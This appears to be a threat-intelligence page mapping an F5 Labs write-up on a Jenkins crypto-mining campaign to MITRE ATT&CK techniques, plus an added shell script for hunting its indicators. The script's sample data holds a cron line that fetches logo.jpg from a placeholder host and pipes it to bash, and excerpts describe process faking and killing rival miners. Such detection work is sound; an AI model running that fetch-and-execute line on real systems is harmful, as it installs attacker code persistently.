TTPwire Vol. 1 · MITRE ATT&CK·Tagged


F5 Labs

New Jenkins Campaign Hides Malware, Kills Competing Crypto-Miners

2018-07-06

ATT&CK techniques detected

12 predictions
T1053.003 Cron
98%
“…’s process so the new malware variant can be installed instead. The last commands in the logo.jpg spearhead file change all downloaded files’ permissions to allow them to run and then run the “x” file. Figure 7: Changing downloaded files’ permissions and running file “x” pe…”
T1204.002 Malicious File
89%
“…: find / -name logo.jpg | xargs file | grep executable. Cronjobs: cronjobs downloading logo.jpg using curl or wget. Processes: a Java process with a cmdline “/usr/sbin/sshd”. The following command can ease the process of finding the offending process: pid=$(…”
T1059.004 Unix Shell
84%
“This decoded base64 string contains a command that first attempts to download the malicious file using wget. If that fails, curl is then used. The resulting downloaded file is then run by bash. Let’s look into the downloaded bash script. Spearhead bash script. The spearhead bash…”
T1190 Exploit Public-Facing Application
77%
“New Jenkins Campaign Hides Malware, Kills Competing Crypto-Miners. F5 researchers recently discovered a new campaign targeting Jenkins automation servers that exploits an unauthenticated code execution vulnerability (CVE-2017-1000353).[1] This is yet another in a series of …”
T1496.001 Compute Hijacking
73%
“…multiple campaigns. It seems that more and more threat actors are discovering the ease of setup and potential profit that lies in malicious crypto mining and they want a piece of the pie. These newcomers try a variety of new approaches to gain a competitive advantage in the b…”
T1059.004 Unix Shell
70%
“…: attacker’s code on Stack Overflow. The upd file is rewritten to check whether the malware process is currently running, and a cronjob is set to run it every minute. This is done by inspecting the PID in the bash.pid file. If it is not running, the run file is started. This be…”
T1496 Resource Hijacking
56%
“…multiple campaigns. It seems that more and more threat actors are discovering the ease of setup and potential profit that lies in malicious crypto mining and they want a piece of the pie. These newcomers try a variety of new approaches to gain a competitive advantage in the b…”
T1134.004 Parent PID Spoofing
55%
“…referenced earlier. Faking the malware command line. In this campaign, the attacker uses a process faker tool from 2002, called xHide, by Schizoprenic, Xnuxer Research. Figure 12: The xHide process faker tool menu. Looking into the h32 and h64 files, we see how xHide hides the proc…”
T1496.001 Compute Hijacking
53%
“…hd related to the commonly used SSH server. This is an old and uncommon practice in this kind of operation, and we haven’t encountered it before. Instead, the attacker usually changes the malware file name and then runs it. The mining malware. The main goal of the Java executa…”
T1059.004 Unix Shell
37%
“…exploited system. While reviewing the pkill commands, it seems that the main goal is to kill the competition because most process names are related to known cryptocurrency miners, for example, kworker34,[3] sourplum,[4] and various process names on imf-conference.org.[5] Figure 5…”
T1496.001 Compute Hijacking
32%
“39 Monero coins mined to date. More than thirty-nine Monero crypto-coins have been mined to date, which at the time of this writing was valued at about $5,100.00 USD. Examining the transactions log on the mining pool, we can see that the earliest logged payment to this wall…”
T1059.007 JavaScript
32%
“New Jenkins Campaign Hides Malware, Kills Competing Crypto-Miners. F5 researchers recently discovered a new campaign targeting Jenkins automation servers that exploits an unauthenticated code execution vulnerability (CVE-2017-1000353).[1] This is yet another in a series of …”
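The indicators the excerpts above describe (an executable logo.jpg on disk, cron jobs fetching it with curl or wget, a watchdog re-run every minute, and a Java process whose command line reads /usr/sbin/sshd because xHide rewrote argv[0]) can be hunted with a few lines of shell. The script below is an added example by the editor, not code from F5 Labs or from the campaign. It assumes a Linux host with /proc; the sample cron lines, the host 198.51.100.7, the /tmp paths and the process table are constructed so the rules can be exercised offline.

```shell
#!/bin/sh
# Hunting helper for the indicators listed in the write-up (executable logo.jpg,
# cron jobs fetching it, a java process whose cmdline reads /usr/sbin/sshd).
# This is the editor's added example, not F5's or the attacker's code. Sample
# lines below are constructed; "--live" reads the host's crontabs and /proc.

# Cron lines that fetch logo.jpg with curl or wget (the spearhead download), or
# that run something every minute (the "upd" watchdog pattern from the article).
# stdin: crontab lines. stdout: matching lines tagged with the rule that fired.
flag_cron_lines() {
    awk '
        /(curl|wget)[^#]*logo\.jpg/ { print "[cron:download] " $0; next }
        $1 == "*" && $2 == "*" && $3 == "*" && $4 == "*" && $5 == "*" {
            print "[cron:every-minute] " $0
        }'
}

# Processes whose command line claims to be sshd while the executable is
# something else. xHide only rewrites argv[0]; /proc/<pid>/exe still resolves
# to the real binary, so a java (or /tmp/sshd) exe behind an "sshd" cmdline is
# the tell. Real sshd lives under /bin, /sbin, /usr/bin or /usr/sbin (merged-usr
# systems resolve /usr/sbin to /usr/bin), and "(deleted)" covers an upgrade.
# stdin: one process per line, "pid<TAB>exe<TAB>cmdline". stdout: [proc] lines.
flag_faked_cmdline() {
    awk 'BEGIN { FS = "\t" }
        $3 ~ /^\/usr\/sbin\/sshd/ && $2 !~ /^\/(usr\/)?s?bin\/sshd( \(deleted\))?$/ {
            print "[proc] pid=" $1 " exe=" $2 " cmdline=" $3
        }'
}

# Build the "pid<TAB>exe<TAB>cmdline" table from /proc on a live Linux host.
proc_table() {
    for d in /proc/[0-9]*; do
        exe=$(readlink "$d/exe" 2>/dev/null || printf '?')
        cmd=$(tr '\0' ' ' < "$d/cmdline" 2>/dev/null)
        printf '%s\t%s\t%s\n' "${d#/proc/}" "$exe" "$cmd"
    done
}

# Constructed sample input: benign lines next to the malicious patterns.
# The host 198.51.100.7 and the /tmp paths are placeholders, not campaign IOCs.
SAMPLE_CRON='0 3 * * * /usr/local/bin/backup.sh
* * * * * (curl -fsSL http://198.51.100.7/logo.jpg || wget -qO- http://198.51.100.7/logo.jpg) | bash
* * * * * /tmp/upd >/dev/null 2>&1'
SAMPLE_PROCS=$(printf '%s\t%s\t%s\n' \
    912  /usr/sbin/sshd                             '/usr/sbin/sshd -D' \
    2201 /usr/lib/jvm/java-8-openjdk-amd64/bin/java 'java -jar /var/lib/jenkins/jenkins.war' \
    4417 /tmp/jre/bin/java                          '/usr/sbin/sshd')

if [ "${1:-}" = "--live" ]; then
    { crontab -l; cat /etc/crontab /etc/cron.d/* /var/spool/cron/*; } 2>/dev/null | flag_cron_lines
    proc_table | flag_faked_cmdline
    # The file check from the write-up, restricted to regular files.
    find / -name logo.jpg -type f -exec file {} + 2>/dev/null | grep -i executable
else
    printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines
    printf '%s\n' "$SAMPLE_PROCS" | flag_faked_cmdline
fi
```

Run it without arguments to see the rules fire on the constructed sample, or with --live to read the host's crontabs and /proc. The exe-versus-cmdline comparison is the part worth keeping: argv[0] rewriting fools ps, but /proc/<pid>/exe still names the real file, so both the faked command line this campaign used and the more common trick of renaming the binary to sshd and dropping it outside the system bin directories are flagged by the same rule.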

Summary

Threat actors continue to find creative yet relatively unsophisticated ways to launch new campaigns to reap profits from crypto-mining operations.